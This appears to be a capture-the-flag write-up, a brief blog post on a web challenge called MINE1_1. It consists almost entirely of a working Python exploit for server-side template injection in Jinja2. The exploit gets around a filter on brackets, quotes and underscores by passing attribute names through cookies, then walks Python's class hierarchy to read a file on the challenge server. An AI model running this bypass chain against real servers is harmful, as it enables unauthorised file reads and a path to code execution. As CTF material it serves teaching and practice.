[Web] MINE1_1 xp0int Posted on Apr 29 2021 ssti, ban [ ] ' " _ # coding=utf-8 import requests payload = '{{((((((request|attr(request.cookies.a)|attr(request.cookies.b)|attr(request.cookies.c))(1))|attr(request.cookies.d))())|attr(request.cookies.c))(40))(request.cookies.file).read()}}' headers = {'Cookie': 'a=__class__;b=__mro__;c=__getitem__;d=__subclasses__;file=flag.txt'} url = 'http://121.37.172.67:30764/success?msg={}'.format(payload) r = requests.get(url, headers=headers) print(r.text) 打赏还是打残,这是个问题 赏 Wechat Pay Alipay [Pwn] pwn1 - cpt.shao [Reverse] PE - Cew
没有帐号? 立即注册